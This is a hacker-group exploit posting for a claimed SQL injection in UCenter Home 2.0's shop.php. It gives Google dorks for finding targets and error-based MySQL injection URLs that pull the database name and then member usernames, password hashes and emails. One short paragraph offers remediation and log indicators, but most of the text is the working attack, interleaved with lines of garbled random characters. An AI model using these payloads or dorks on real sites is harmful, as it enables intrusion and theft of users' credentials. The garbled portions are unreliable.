__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
; z" G# z- T1 ^ o7 P L& h' U/ G# U _& {9 d1 W
Dork : Powered by UCenter inurl:shop.php?ac=view
& M+ A% f- w' M; s! w B# s0 q( u
' n) Y# J7 [( T4 YDork 2 : inurl:shop.php?ac=view&shopid= ! C5 \/ v! G' N( Q0 t& W5 i
. @: A# Y, k) @* p, b
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability type : SQL Injection (MySQL error-based). The SQL is accepted inside the numeric shopid value, which suggests shopid reaches the MySQL query without integer validation or parameter binding; casting shopid to an integer (or binding it as a query parameter) and not returning MySQL error text to the client would close this path. Requests to shop.php whose shopid contains information_schema or floor(rand(0)*2) are a practical log/WAF indicator of the technique.

Needed materials : Hex conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
- e% Z/ G3 i) q8 K+ v" H4 R* V( D% D
Your Need victim Database name. : J) l; ^' E' Q- d- ?: f* p
3 f" i$ R/ B; h0 b. D) h! Gfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ! b9 M& f3 P6 t" V* {1 g
$ A' X9 c0 W2 I1 i2 L+ F..
, `. B! i- y# H3 x& M" \# v: `/ h0 F+ ]( F3 U2 X ?
DB : Okey. " D8 @) A; `) _6 e
3 F5 j! I" Z, M- g7 k1 q* iyour edit DB `[TARGET DB NAME]` % K+ T5 h; y, a3 P- b7 ]/ G
5 P/ n1 }/ q( r8 Q' i5 o7 b. C
Example : 'hiwir1_ucenter'
) D. M u+ e7 N3 d" u4 h8 f7 Q0 V
% e, T, ?" h4 w/ SEdit : Okey.
) p' D8 x( |5 u {
8 ]) p1 g- y2 ^4 J' @' QYour use Hex conversion. And edit Your SQL Injection Exploit.. ( N) d2 `/ ]2 [2 m* u0 m
6 e. F8 C2 D5 w5 P. ~3 N5 y
& E7 L& L7 ?! P
) P- ?" Z3 r: y5 a1 f- kExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 8 f: ^5 @0 x2 c$ \4 \" {! v